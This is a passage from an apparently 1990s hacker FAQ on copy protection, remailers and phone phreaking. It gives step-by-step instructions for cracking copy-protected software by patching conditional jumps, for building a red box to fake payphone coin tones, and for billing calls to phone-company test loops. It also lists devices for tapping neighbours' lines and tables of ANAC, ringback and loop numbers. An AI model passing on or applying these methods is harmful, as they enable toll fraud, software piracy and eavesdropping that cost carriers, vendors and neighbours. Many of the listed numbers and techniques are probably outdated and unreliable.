  2529. equipment or use equipment without strong emanations.
  2530.  
  2531. Tempest is the US Government program for evaluation and endorsement
  2532. of electronic equipment that is safe from eavesdropping.
  2533.  
  2534.  
  2535. 28. What is an anonymous remailer?
  2536.  
  2537. An anonymous remailer is a system on the Internet that allows you to
  2538. send e-mail anonymously or post messages to Usenet anonymously.
  2539.  
  2540. You apply for an anonymous ID at the remailer site.  Then, when you
  2541. send a message to the remailer, it sends it out from your anonymous ID
  2542. at the remailer.  No one reading the post will know your real account
  2543. name or host name.  If someone sends a message to your anonymous ID,
  2544. it will be forwarded to your real account by the remailer.
  2545.  
  2546.  
  2547. 29. What are the addresses of some anonymous remailers?
  2548.  
  2549. The most popular and stable anonymous remailer is anon.penet.fi,
  2550. operated by Johan Helsingus.  To obtain an anonymous ID, mail
  2551. ping@anon.penet.fi.  For assistance is obtaining an anonymous account
  2552. at penet, mail help@anon.penet.fi.
  2553.  
  2554.  
  2555. 30. How do I defeat Copy Protection?
  2556.  
  2557. There are two common methods of defeating copy protection.  The first
  2558. is to use a program that removes copy protection.  Popular programs
  2559. that do this are CopyIIPC from Central Point Software and CopyWrite
  2560. from Quaid Software.  The second method involves patching the copy
  2561. protected program.  For popular software, you may be able to locate a
  2562. ready made patch.  You can them apply the patch using any hex editor,
  2563. such as debug or the Peter Norton's DiskEdit.  If you cannot, you must
  2564. patch the software yourself.
  2565.  
  2566. Writing a patch requires a debugger, such as Soft-Ice or Sourcer.  It
  2567. also requires some knowledge of assembly language.  Load the protected
  2568. program under the debugger and watch for it to check the protection
  2569. mechanism.  When it does, change that portion of the code.  The code
  2570. can be changed from JE (Jump on Equal) or JNE (Jump On Not Equal) to
  2571. JMP (Jump Unconditionally).  Or the code may simply be replaced with
  2572. NOP (No Operation) instructions.
  2573.  
  2574.  
  2575.  
  2576.  
  2577. Section B: Telephony
  2578. ~~~~~~~~~~~~~~~~~~~~
  2579.  
  2580. 01. What is a Red Box?
  2581.  
  2582. When a coin is inserted into a payphone, the phone emits a set of
  2583. tones.  A red box is a device that simulates those tones, with the
  2584. purpose of fooling the payphone into believing you have inserted an
  2585. actual coin.  The actual tones are:
  2586.  
  2587. Nickel Signal      1700+2200  0.060s on
  2588. Dime Signal        1700+2200  0.060s on, 0.060s off, twice repeating
  2589. Quarter Signal     1700+2200  33ms on, 33ms off, 5 times repeating
  2590.  
  2591.  
  2592. 02. How do I build a Red Box?
  2593.  
  2594. Red boxes are commonly manufactured from modified Radio Shack tone
  2595. dialers, Hallmark greeting cards, or made from scratch from readily
  2596. available electronic components.
  2597.  
  2598. To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer,
  2599. open the dialer and replace the crystal (the largest shiny metal
  2600. component).  The exact value needed is 6.502457409Mhz.  Unfortunately,
  2601. that crystal is not commonly manufactured.  A crystal close to that
  2602. value will create a tone that falls within tolerances.  The most
  2603. popular choice is the 6.5536Mhz crystal.  When you are finished
  2604. replacing the crystal, program the P1 button with five *'s.  That will
  2605. simulate a quarter tone each time you press P1.
  2606.  
  2607.  
  2608. 03. Where can I get a 6.5536Mhz crystal?
  2609.  
  2610. Your best bet is a local electronics store.  Radio Shack sells them,
  2611. but they are overpriced and the store must order them in.  This takes
  2612. approximately two weeks.  In addition, many Radio Shack employees do
  2613. not know that this can be done.
  2614.  
  2615. Or, you could order the crystal mail order.  This introduces Shipping
  2616. and Handling charges, which are usually much greater than the price of
  2617. the crystal.  It's best to get several people together to share the
  2618. S&H cost.  Or, buy five or six yourself and sell them later.  Some of
  2619. the places you can order crystals are:
  2620.  
  2621. Digi-Key
  2622. 701 Brooks Avenue South
  2623. P.O. Box 677
  2624. Thief River Falls, MN 56701-0677
  2625. (80)344-4539
  2626. Part Number:X415-ND    /* Note: 6.500Mhz and only .197 x .433 x .149! */
  2627. Part Number:X018-ND
  2628.  
  2629. JDR Microdevices:
  2630. 2233 Branham Lane
  2631. San Jose, CA 95124
  2632. (800)538-5000
  2633. Part Number: 6.5536MHZ
  2634.  
  2635. Tandy Express Order Marketing
  2636. 401 NE 38th Street
  2637. Fort Worth, TX 76106
  2638. (800)241-8742
  2639. Part Number: 10068625
  2640.  
  2641.  
  2642. 04. Which payphones will a Red Box work on?
  2643.  
  2644. Red Boxes will work on TelCo owned payphones, but not on COCOT's
  2645. (Customer Owned Coin Operated Telephones).
  2646.  
  2647.  
  2648. 05. What is a Blue Box?
  2649.  
  2650. Blue boxes use a 2600hz tone to convince telephone switches that use
  2651. in-band signalling that the caller is actually a telephone operator.
  2652. The caller may then access special switch functions, with the usual
  2653. purpose of making free long distance phone calls, using the
  2654. Multi-Frequency tones provided by the Blue Box.
  2655.  
  2656.  
  2657. 06. Do Blue Boxes still work?
  2658.  
  2659. Blue Boxes still work in areas using in-band signalling.  Modern phone
  2660. signalling switches using ESS (Electronic Signalling Systems) use
  2661. out-of-band-signalling.  Nothing you send over the voice portion of
  2662. bandwidth can control the switch.
  2663.  
  2664.  
  2665. 07. What is a Black Box?
  2666.  
  2667. A Black Box is a 1.8k ohm resistor placed across your phone line to
  2668. cause the phone company equipment to be unable to detect that you have
  2669. answered your telephone.  People who call you will then not be billed
  2670. for the telephone call.  Black boxes do not work under ESS.
  2671.  
  2672.  
  2673. 08. What do all the colored boxes do?
  2674.  
  2675. Acrylic      Steal Three-Way-Calling, Call Waiting and programmable
  2676.          Call Forwarding on old 4-wire phone systems
  2677. Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
  2678. Beige        Lineman's hand set
  2679. Black        Allows the calling party to not be billed for the call
  2680.          placed
  2681. Blast        Phone microphone amplifier
  2682. Blotto       Supposedly shorts every fone out in the immediate area
  2683. Blue         Emulate a true operator by seizing a trunk with a 2600hz
  2684.          tone
  2685. Brown        Create a party line from 2 phone lines
  2686. Bud          Tap into your neighbors phone line
  2687. Chartreuse   Use the electricity from your phone line
  2688. Cheese       Connect two phones to create a diverter
  2689. Chrome       Manipulate Traffic Signals by Remote Control
  2690. Clear        A telephone pickup coil and a small amp use to make free
  2691.          calls on Fortress Phones
  2692. Color        Line activated telephone recorder
  2693. Copper       Cause crosstalk interference on an extender
  2694. Crimson      Hold button
  2695. Dark         Re-route outgoing or incoming calls to another phone
  2696. Dayglo       Connect to your neighbors phone line
  2697. Divertor     Re-route outgoing or incoming calls to another phone
  2698. DLOC         Create a party line from 2 phone lines
  2699. Gold         Trace calls, tell if the call is being traced, and can
  2700.          change a trace
  2701. Green        Emulate the Coin Collect, Coin Return, and Ringback tones
  2702. Infinity     Remotely activated phone tap
  2703. Jack         Touch-Tone key pad
  2704. Light        In-use light
  2705. Lunch        AM transmitter
  2706. Magenta      Connect a remote phone line to another remote phone line
  2707. Mauve        Phone tap without cutting into a line
  2708. Neon         External microphone
  2709. Noise        Create line noise
  2710. Olive        External ringer
  2711. Party        Create a party line from 2 phone lines
  2712. Pearl        Tone generator
  2713. Pink         Create a party line from 2 phone lines
  2714. Purple       Telephone hold button
  2715. Rainbow      Kill a trace by putting 120v into the phone line (joke)
  2716. Razz         Tap into your neighbors phone
  2717. Red          Make free phone calls from pay phones by generating
  2718.          quarter tones
  2719. Rock         Add music to your phone line
  2720. Scarlet      Cause a neighbors phone line to have poor reception
  2721. Silver       Create the DTMF tones for A, B, C and D
  2722. Static       Keep the voltage on a phone line high
  2723. Switch       Add hold, indicator lights, conferencing, etc..
  2724. Tan          Line activated telephone recorder
  2725. Tron         Reverse the phase of power to your house, causing your
  2726.          electric meter to run slower
  2727. TV Cable     "See" sound waves on your TV
  2728. Urine        Create a capacitative disturbance between the ring and
  2729.          tip wires in another's telephone headset
  2730. Violet       Keep a payphone from hanging up
  2731. White        Portable DTMF keypad
  2732. Yellow       Add an extension phone
  2733.  
  2734.  
  2735. 09. What is an ANAC number?
  2736.  
  2737. An ANAC (Automatic Number Announcement Circuit) number is a telephone
  2738. number that plays back the number of the telephone that called it.
  2739. ANAC numbers are convenient if you want to know the telephone number
  2740. of a pair of wires.
  2741.  
  2742.  
  2743. 10. What is the ANAC number for my area?
  2744.  
  2745. How to find your ANAC number:
  2746.  
  2747. Look up your NPA (Area Code) and try the number listed for it. If that
  2748. fails, try 1 plus the number listed for it.  If that fails, try the
  2749. common numbers like 311, 958 and 200-222-2222.  If you find the ANAC
  2750. number for your area, please let us know.
  2751.  
  2752. Note that many times the ANAC number will vary for different
  2753. switches in the same city.
  2754.  
  2755. Many companies operate 800 number services which will read back to you
  2756. the number from which you are calling.  Many of these require
  2757. navigating a series of menus to get the phone number you are looking
  2758. for.
  2759.  
  2760. (800)238-4959   A voice mail system
  2761. (800)328-2630   A phone sex line
  2762. (800)568-3197   Info Access Telephone Company's Automated Blocking Line
  2763. (800)571-8859   A phone sex line
  2764. (800)692-6447   (800)MY-ANI-IS
  2765. (800)769-3766   Duke Power Company Automated Outage System
  2766.  
  2767. An non-800 ANAC that works nationwide is 404-988-9664.  The one catch
  2768. with this number is that it must be dialed with the AT&T Carrier
  2769. Access Code 10732.
  2770.  
  2771. Please use local ANAC numbers if you can, as abuse or overuse kills
  2772. 800 ANAC numbers.
  2773.  
  2774. NPA  ANAC number      Comments
  2775. ---  ---------------  ---------------------------------------------
  2776. 201  958              Hackensack/Jersey City/Newark/Paterson, NJ
  2777. 202  958-xxxx         District of Columbia
  2778. 203  960              CT (All)
  2779. 203  970              CT (All)
  2780. 205  908-222-2222     Birmingham, AL
  2781. 206  411              WA /* Not US West */
  2782. 207  958              ME (All)
  2783. 209  830              Stockton, CA
  2784. 212  958              Manhattan, NY
  2785. 213  114              Los Angeles, CA
  2786. 213  1223             Los Angeles, CA /* some 1AESS switches */
  2787. 213  211-2345         Los Angeles, CA /* English response */
  2788. 213  211-2346         Los Angeles, CA /* DTMF response */
  2789. 213  61056            Los Angeles, CA
  2790. 214  790              Dallas, TX /* GTE */
  2791. 214  970-222-2222     Dallas, TX
  2792. 214  970-611-1111     Dallas, TX /* Southwestern Bell */
  2793. 215  410-xxxx         Philadelphia, PA
  2794. 217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL
  2795. 301  958-9968         Hagerstown/Rockville, MD
  2796. 305  200-222-2222     Ft. Lauderdale/Key West/Miami, FL
  2797. 309  200-xxx-xxxx     Peoria/Rock Island, IL
  2798. 310  114              Long Beach, CA /* on many GTE switches */
  2799. 310  1223             Long Beach, CA /* some 1AESS switches */
  2800. 310  211-2345         Long Beach, CA /* English response */
  2801. 310  211-2346         Long Beach, CA /* DTMF response */
  2802. 312  200              Chicago, IL
  2803. 312  290              Chicago, IL
  2804. 312  1-200-8825       Chicago, IL (Last four change rapidly)
  2805. 313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI
  2806. 313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI
  2807. 313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI
  2808. 313  200200200200200  Ann Arbor/Dearborn/Detroit, MI
  2809. 314  410-xxxx#        Columbia/Jefferson City/St.Louis, MO
  2810. 314  511              Columbia/Jefferson City/St.Louis, MO
  2811. 315  953              Syracuse/Utica, NY
  2812. 315  958              Syracuse/Utica, NY
  2813. 317  310-222-2222     Indianapolis/Kokomo, IN
  2814. 317  743-1218         Indianapolis/Kokomo, IN
  2815. 401  200-200-4444     RI (All)
  2816. 401  222-2222         RI (All)
  2817. 402  311              Lincoln, NE
  2818. 404  311              Atlanta, GA
  2819. 404  940-xxx-xxxx     Atlanta, GA
  2820. 405  897              Enid/Oklahoma City, OK
  2821. 407  200-222-2222     Orlando/West Palm Beach, FL
  2822. 408  300-xxx-xxxx     San Jose, CA
  2823. 408  760              San Jose, CA
  2824. 408  940              San Jose, CA
  2825. 409  951              Beaumont/Galveston, TX
  2826. 409  970-xxxx         Beaumont/Galveston, TX
  2827. 410  200-6969         Annapolis/Baltimore, MD
  2828. 410  200-555-1212     Annapolis/Baltimore, MD
  2829. 410  811              Annapolis/Baltimore, MD
  2830. 412  711-6633         Pittsburgh, PA
  2831. 412  711-4411         Pittsburgh, PA
  2832. 412  999-xxxx         Pittsburgh, PA
  2833. 413  958              Pittsfield/Springfield, MA
  2834. 413  200-555-5555     Pittsfield/Springfield, MA
  2835. 414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  2836. 415  200-555-1212     San Francisco, CA
  2837. 415  211-2111         San Francisco, CA
  2838. 415  2222             San Francisco, CA
  2839. 415  640              San Francisco, CA
  2840. 415  760-2878         San Francisco, CA
  2841. 415  7600-2222        San Francisco, CA
  2842. 419  311              Toledo, OH
  2843. 502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY
  2844. 503  611              Portland, OR  /* not all parts of town */
  2845. 508  958              Fall River/New Bedford/Worchester, MA
  2846. 508  200-222-1234     Fall River/New Bedford/Worchester, MA
  2847. 508  200-222-2222     Fall River/New Bedford/Worchester, MA
  2848. 509  560              Spokane/Walla Walla/Yakima, WA
  2849. 512  200-222-2222     Austin/Corpus Christi, TX
  2850. 512  830              Austin/Corpus Christi, TX
  2851. 512  970-xxxx         Austin/Corpus Christi, TX
  2852. 515  5463             Des Moines, IA
  2853. 516  958              Hempstead/Long Island, NY
  2854. 516  968              Hempstead/Long Island, NY
  2855. 517  200-222-2222     Bay City/Jackson/Lansing, MI
  2856. 517  200200200200200  Bay City/Jackson/Lansing, MI
  2857. 518  997              Albany/Schenectady/Troy, NY
  2858. 518  998              Albany/Schenectady/Troy, NY
  2859. 602  593-0809         Phoenix, AZ
  2860. 602  593-6017         Phoenix, AZ
  2861. 602  593-7451         Phoenix, AZ
  2862. 603  200-222-2222     NH (All)
  2863. 606  997-555-1212     Ashland/Winchester, KY
  2864. 607  993              Binghamton/Elmira, NY
  2865. 609  958              Atlantic City/Camden/Trenton/Vineland, NJ
  2866. 612  511              Minneapolis/St.Paul, MN
  2867. 615  200200200200200  Nashville, TN
  2868. 615  830              Nashville, TN
  2869. 616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI
  2870. 617  200-222-1234     Boston, MA
  2871. 617  200-222-2222     Boston, MA
  2872. 617  200-444-4444     Boston, MA /* Woburn, MA */
  2873. 617  220-2622         Boston, MA
  2874. 617  958              Boston, MA
  2875. 618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL
  2876. 703  811              Alexandria/Arlington/Roanoke, VA
  2877. 708  1-200-8825       Chicago/Elgin, IL (Last four change rapidly)
  2878. 708  356-9646         Chicago/Elgin, IL
  2879. 713  970-xxxx         Houston, TX
  2880. 714  211-2121         Anaheim, CA /* GTE */
  2881. 716  511              Buffalo/Niagara Falls/Rochester, NY /* Rochester Tel */
  2882. 717  958              Harrisburg/Scranton/Wilkes-Barre, PA
  2883. 718  958              Bronx/Brooklyn/Queens/Staten Island, NY
  2884. 802  2-222-222-2222   Vermont (All)
  2885. 802  200-222-2222     Vermont (All)
  2886. 805  830              San Luis Obispo, CA
  2887. 806  970-xxxx         Amarillo/Lubbock, TX
  2888. 810  200200200200200  Michigan
  2889. 812  410-555-1212     Evansville, IN
  2890. 813  311              Ft. Meyers/St. Petersburg/Tampa, FL
  2891. 815  200-xxx-xxxx     La Salle/Rockford, IL
  2892. 815  290              La Salle/Rockford, IL
  2893. 817  211              Ft. Worth/Waco, TX
  2894. 817  970-611-1111     Ft. Worth/Waco, TX  /* Southwestern Bell */
  2895. 818  1223             Pasadena, CA /* some 1AESS switches */
  2896. 818  211-2345         Pasadena, CA /* English response */
  2897. 818  211-2346         Pasadena, CA /* DTMF response */
  2898. 906  1-200-222-2222   Marquette/Sault Ste. Marie, MI
  2899. 908  958              New Brunswick, NJ
  2900. 910  311              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  2901. 910  988              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  2902. 914  990-1111         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  2903. 915  970-xxxx         Abilene/El Paso, TX
  2904. 919  711              Durham, NC
  2905.  
  2906. Canada:
  2907. 204  644-xxxx         Manitoba
  2908. 306  115              Saskatchewan, Canada
  2909. 403  311              Alberta, Yukon and N.W. Territory
  2910. 403  908-222-2222     Alberta, Yukon and N.W. Territory
  2911. 403  999              Alberta, Yukon and N.W. Territory
  2912. 416  410-xxxx         Toronto, Ontario
  2913. 416  997-xxxx         Toronto, Ontario
  2914. 514  320-xxxx         Montreal, Quebec
  2915. 519  320-xxxx         London, Ontario
  2916. 604  1116             British Columbia, Canada
  2917. 604  1211             British Columbia, Canada
  2918. 604  211              British Columbia, Canada
  2919. 613  320-2232         Ottawa, Ontario
  2920. 705  320-xxxx         Saulte Ste. Marie, Ontario
  2921.  
  2922. Australia:
  2923. +61  03-552-4111      Victoria 03 area
  2924. +61  19123            All major capital cities
  2925.  
  2926. United Kingdom:
  2927. 175
  2928.  
  2929.  
  2930. 11. What is a ringback number?
  2931.  
  2932. A ringback number is a number that you call that will immediately
  2933. ring the telephone from which it was called.
  2934.  
  2935. In most instances you must call the ringback number, quickly hang up
  2936. the phone for just a short moment and then let up on the switch, you
  2937. will then go back off hook and hear a different tone.  You may then
  2938. hang up.  You will be called back seconds later.
  2939.  
  2940.  
  2941. 12. What is the ringback number for my area?
  2942.  
  2943. An 'x' means insert those numbers from the phone number from which you
  2944. are calling.  A '?' means that the number varies from switch to switch
  2945. in the area, or changes from time to time.  Try all possible
  2946. combinations.
  2947.  
  2948. If the ringback for your NPA is not listed, try common ones such as
  2949. 954, 957 and 958.  Also, try using the numbers listed for other NPA's
  2950. served by your telephone company.
  2951.  
  2952. 201  551-xxxx         Hackensack/Jersey City/Newark/Paterson, NJ
  2953. 202  958-xxxx         District of Columbia
  2954. 203  991-xxxx         CT (All)
  2955. 209  890-xxxx         Stockton, CA
  2956. 213  1-95x-xxxx       Los Angeles, CA
  2957. 301  958-xxxx         Hagerstown/Rockville, MD
  2958. 303  99X-xxxx         Grand Junction, CO
  2959. 312  511-xxxx         Chicago, IL
  2960. 312  511-xxx-xxxx     Chicago, IL
  2961. 312  57?-xxxx         Chicago, IL
  2962. 315  98x-xxxx         Syracuse/Utica, NY
  2963. 317  777-xxxx         Indianapolis/Kokomo, IN
  2964. 401  98?-xxxx         RI (All)
  2965. 407  988-xxxx         Orlando/West Palm Beach, FL
  2966. 412  985-xxxx         Pittsburgh, PA
  2967. 414  977-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  2968. 414  978-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  2969. 415  350-xxxx         San Francisco, CA
  2970. 501  721-xxx-xxxx     AR (All)
  2971. 502  988              Lexington, KY
  2972. 504  9988776655       Baton Rouge/New Orleans, LA
  2973. 512  95X-xxxx         Austin, TX
  2974. 516  660-xxx-xxxx     Hempstead/Long Island, NY
  2975. 601  777-xxxx         MS (All)
  2976. 609  55?-xxxx         Atlantic City/Camden/Trenton/Vineland, NJ
  2977. 616  946-xxxx         Battle Creek/Grand Rapids/Kalamazoo, MI
  2978. 619  331-xxxx         San Diego, CA
  2979. 619  332-xxxx         San Diego, CA
  2980. 703  958-xxxx         Alexandria/Arlington/Roanoke, VA
  2981. 716  981-xxxx         Rochester, NY /* Rochester Tel */
  2982. 719  99x-xxxx         Colorado Springs/Leadville/Pueblo, CO
  2983. 801  938-xxxx         Utah (All)
  2984. 801  939-xxxx         Utah (All)
  2985. 804  260              Charlottesville/Newport News/Norfolk/Richmond, VA
  2986. 805  114              Bakersfield/Santa Barbara, CA
  2987. 813  711              Ft. Meyers/St. Petersburg/Tampa, FL
  2988. 817  971                /* Press 2# */
  2989. 906  951-xxx-xxxx     Marquette/Sault Ste. Marie, MI
  2990. 908  55?-xxxx         New Brunswick, NJ
  2991. 914  660-xxxx         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  2992.  
  2993. Canada:
  2994. 416  57x-xxxx         Toronto, Ontario
  2995. 416  99x-xxxx         Toronto, Ontario
  2996. 416  999-xxx-xxxx     Toronto, Ontario
  2997. 514  320-xxx-xxxx     Montreal, Quebec
  2998. 613  999-xxx-xxxx     Ottawa, Ontario
  2999.  
  3000. Australia:
  3001. +61 199
  3002.  
  3003. United Kingdom:
  3004. 174
  3005.  
  3006.  
  3007. 13. What is a loop?
  3008.  
  3009. This FAQ answer is excerpted from: ToneLoc v0.99 User Manual
  3010.                    by Minor Threat & Mucho Maas
  3011.  
  3012. Loops are a pair of phone numbers, usually consecutive, like 836-9998
  3013. and 836-9999.  They are used by the phone company for testing.  What
  3014. good do loops do us?  Well, they are cool in a few ways.  Here is a
  3015. simple use of loops.  Each loop has two ends, a 'high' end, and a
  3016. 'low' end.  One end gives a (usually) constant, loud tone when it is
  3017. called. The other end is silent.  Loops don't usually ring either.
  3018. When BOTH ends are called, the people that called each end can talk
  3019. through the loop.  Some loops are voice filtered and won't pass
  3020. anything but a constant tone; these aren't much use to you.  Here's
  3021. what you can use working loops for:  billing phone calls!  First, call
  3022. the end that gives the loud tone.  Then if the operator or someone
  3023. calls the other end, the tone will go quiet.  Act like the phone just
  3024. rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or
  3025. what the fuck ever.  The operator thinks that she just called you, and
  3026. that's it!  Now the phone bill will go to the loop, and your local
  3027. RBOC will get the bill!  Use this technique in moderation, or the loop
  3028. may go down.  Loops are probably most useful when you want to talk to
  3029. someone to whom you don't want to give your phone number.
  3030.  
  3031.  
  3032. 14. What is a loop in my area?
  3033.  
  3034. Many of these loops are no longer functional.  If you are local
  3035. to any of these loops, please try them out an e-mail me the results
  3036. of your research.
  3037.  
  3038. NPA    High      Low
  3039. ---  --------  --------
  3040. 201  228-9929  228-9930
  3041. 201  238-9929  238-9930
  3042. 201  251-9929  251-9930
  3043. 201  254-9929  254-9930
  3044. 201  272-9929  272-9930
  3045. 201  330-9929  330-9930
  3046. 201  333-9929  333-9930
  3047. 201  339-9929  339-9930
  3048. 201  347-9929  347-9930
  3049. 201  376-9929  376-9930
  3050. 201  398-9929  398-9930
  3051. 201  467-9929  467-9930
  3052. 201  528-9929  528-9930
  3053. 201  558-9929  558-9930
  3054. 201  559-9929  559-9930
  3055. 201  560-9929  560-9930
  3056. 201  592-9929  592-9930
  3057. 201  625-9929  625-9930
  3058. 201  631-9929  631-9930
  3059. 201  637-9929  637-9930
  3060. 201  655-9929  655-9930
  3061. 201  666-9929  666-9930
  3062. 201  690-9929  690-9930
  3063. 201  761-9929  761-9930
  3064. 201  762-9929  762-9929
  3065. 201  762-9929  762-9930
  3066. 201  762-9929  762-9929
  3067. 201  763-9929  763-9930
  3068. 201  764-9929  764-9930
  3069. 201  767-9929  767-9930
  3070. 201  768-9929  768-9930
  3071. 201  773-9929  773-9930
  3072. 201  879-9929  879-9930
  3073. 201  946-9929  946-9930
  3074. 201  992-9929  992-9930
  3075. 201  993-9929  993-9930
  3076. 201  994-9929  994-9930
  3077. 213  360-1118  360-1119
  3078. 213  365-1118  365-1119
  3079. 213  455-0002  455-xxxx
  3080. 213  455-0002  455-XXXX
  3081. 213  546-0002  546-XXXX
  3082. 213  546-0002  546-xxxx
  3083. 305  778-9952  778-9951
  3084. 305  964-9951  964-9952
  3085. 312  222-9973  222-9974
  3086. 312  234-9973  234-9974
  3087. 313  224-9996  224-9997
  3088. 313  225-9996  225-9997
  3089. 313  234-9996  234-9997
  3090. 313  237-9996  237-9997
  3091. 313  256-9996  256-9997
  3092. 313  272-9996  272-9997
  3093. 313  273-9996  273-9997
  3094. 313  277-9996  277-9997
  3095. 313  281-9996  281-9997
  3096. 313  292-9996  292-9997
  3097. 313  299-9996  299-9997
  3098. 313  321-9996  321-9997
  3099. 313  326-9996  326-9997
  3100. 313  356-9996  356-9997
  3101. 313  362-9996  362-9997
  3102. 313  369-9996  369-9997
  3103. 313  388-9996  388-9997
  3104. 313  397-9996  397-9997
  3105. 313  399-9996  399-9997
  3106. 313  445-9996  445-9997
  3107. 313  465-9996  465-9997
  3108. 313  471-9996  471-9997
  3109. 313  474-9996  474-9997
  3110. 313  477-9996  477-9997
  3111. 313  478-9996  478-9997
  3112. 313  483-9996  483-9997
  3113. 313  497-9996  497-9997
  3114. 313  526-9996  526-9997
  3115. 313  552-9996  552-9997
  3116. 313  556-9996  556-9997
  3117. 313  561-9996  561-9997
  3118. 313  569-9996  569-9996
  3119. 313  575-9996  575-9997
  3120. 313  577-9996  577-9997
  3121. 313  585-9996  585-9997
  3122. 313  591-9996  591-9997
  3123. 313  621-9996  621-9997
  3124. 313  626-9996  626-9997
  3125. 313  644-9996  644-9997
  3126. 313  646-9996  646-9997
  3127. 313  647-9996  647-9997
  3128. 313  649-9996  649-9997
  3129. 313  663-9996  663-9997
  3130. 313  665-9996  665-9997
  3131. 313  683-9996  683-9997
  3132. 313  721-9996  721-9997
  3133. 313  722-9996  722-9997
  3134. 313  728-9996  728-9997
  3135. 313  731-9996  731-9997
  3136. 313  751-9996  751-9997
  3137. 313  776-9996  776-9997
  3138. 313  781-9996  781-9997
  3139. 313  787-9996  787-9997
  3140. 313  822-9996  822-9997
  3141. 313  833-9996  833-9997
  3142. 313  851-9996  851-9997
  3143. 313  871-9996  871-9997
  3144. 313  875-9996  875-9997
  3145. 313  886-9996  886-9997
  3146. 313  888-9996  888-9997
  3147. 313  898-9996  898-9997
  3148. 313  934-9996  934-9997
  3149. 313  942-9996  942-9997
  3150. 313  963-9996  963-9997
  3151. 313  977-9996  977-9997
  3152. 313  995-9996  995-9997
  3153. 315  673-9995  673-9996
  3154. 315  695-9995  695-9996
  3155. 402  422-0001  422-0002
  3156. 402  422-0005  422-0006
  3157. 402  422-0007  422-0008
  3158. 402  422-0003  422-0004
  3159. 402  422-0005  422-0006
  3160. 402  422-0007  422-0008
  3161. 402  422-0009  ALL-PREF
  3162. 402  422-0003  422-0004
  3163. 402  422-0009  ALL-PREF
  3164. 402  422-0001  422-0002
  3165. 402  572-0003  572-0004
  3166. 517  422-9996  422-9997
  3167. 517  423-9996  423-9997
  3168. 517  455-9996  455-9997
  3169. 517  563-9996  563-9997
  3170. 517  663-9996  663-9997
  3171. 517  851-9996  851-9997
  3172. 609  921-9929  921-9930
  3173. 609  994-9929  994-9930
  3174. 616  997-9996  997-9997
  3175. 616  ALL-PREF  ALL-PREF
  3176. 713  224-1499  759-1799
  3177. 713  324-1499  324-1799
  3178. 713  342-1499  342-1799
  3179. 713  351-1499  351-1799
  3180. 713  354-1499  354-1799
  3181. 713  356-1499  356-1799
  3182. 713  442-1499  442-1799
  3183. 713  447-1499  447-1799
  3184. 713  455-1499  455-1799
  3185. 713  458-1499  458-1799
  3186. 713  462-1499  462-1799
  3187. 713  466-1499  466-1799
  3188. 713  468-1499  468-1799
  3189. 713  469-1499  469-1799
  3190. 713  471-1499  471-1799
  3191. 713  481-1499  481-1799
  3192. 713  482-1499  482-1799
  3193. 713  484-1499  484-1799
  3194. 713  487-1499  487-1799
  3195. 713  489-1499  489-1799
  3196. 713  492-1499  492-1799
  3197. 713  493-1499  493-1799
  3198. 713  524-1499  524-1799
  3199. 713  526-1499  526-1799
  3200. 713  555-1499  555-1799
  3201. 713  661-1499  661-1799
  3202. 713  664-1499  664-1799
  3203. 713  665-1499  665-1799
  3204. 713  666-1499  666-1799
  3205. 713  667-1499  667-1799
  3206. 713  682-1499  976-1799
  3207. 713  771-1499  771-1799
  3208. 713  780-1499  780-1799
  3209. 713  781-1499  997-1799
  3210. 713  960-1499  960-1799
  3211. 713  977-1499  977-1799
  3212. 713  988-1499  988-1799
  3213. 714  535-1118  535-1119
  3214. 714  538-1118  538-1119
  3215. 714  858-1118  858-1119
  3216. 714  879-1118  879-1119
  3217. 805  528-0044  528-0045
  3218. 805  544-0044  544-0045
  3219. 805  773-0044  773-0045
  3220. 813  385-9971
  3221. 908  776-9930  776-9930
  3222.  
  3223.  
  3224. 15. What is a CNA number?
  3225.  
  3226. CNA stands for Customer Name and Address.  The CNA number is a phone
  3227. number for telephone company personnel to call and get the name and
  3228. address for a phone number.  If a telephone lineman finds a phone line
  3229. he does not recognize, he can use the ANI number to find it's phone
  3230. number and then call the CNA operator to see who owns it and where
  3231. they live.
  3232.  
  3233. Normal CNA numbers are available only to telephone company personnel.
  3234. Private citizens may now legally get CNA information from private
  3235. companies.  Two such companies are:
  3236.  
  3237. Unidirectory    (900)933-3330
  3238. Telename        (900)884-1212
  3239.  
  3240. Note that these are 900 numbers, and will cost you approximately one
  3241. dollar per minute.
  3242.  
  3243. If you are in 312 or 708, AmeriTech has a pay-for-play CNA service
  3244. available to the general public.  The number is 796-9600.  The cost is
  3245. $.35/call and can look up two numbers per call.
  3246.  
  3247.  
  3248. 16. What is the telephone company CNA number for my area?
  3249.  
  3250. 203  203-771-8080     CT (All)
  3251. 614  614-464-0123     Columbus/Steubenville, OH
  3252. 813  813-270-8711     Ft. Meyers/St. Petersburg/Tampa, FL
  3253.  
  3254.  
  3255. 17. What are some numbers that always ring busy?
  3256.  
  3257. 501  377-99xx                   AR (All)
  3258. 719  577-6100 to 577-6200       Colorado Springs/Leadville/Pueblo, CO
  3259. 906  632-9999                   Marquette/Sault Ste. Marie, MI
  3260. 906  635-9999                   Marquette/Sault Ste. Marie, MI
  3261.  
  3262.  
  3263. 18. What are some numbers that temporarily disconnect phone service?
  3264.  
  3265. 516  480 Hempstead/Long Island, NY      (60 seconds)
  3266. 603  980 NH (All)
  3267.  
  3268.  
  3269. 19. What is scanning?
  3270.  
  3271. Scanning is dialing a large number of telephone numbers in the hope
  3272. of finding interesting carriers (computers) or tones.
  3273.  
  3274. Scanning can be done by hand, although dialing several thousand
  3275. telephone numbers by hand is extremely boring and takes a long time.
  3276.  
  3277. Much better is to use a scanning program, sometimes called a war
  3278. dialer or a demon dialer.  Currently, the best war dialer available
  3279. to PC-DOS users is ToneLoc .99b8.
  3280.  
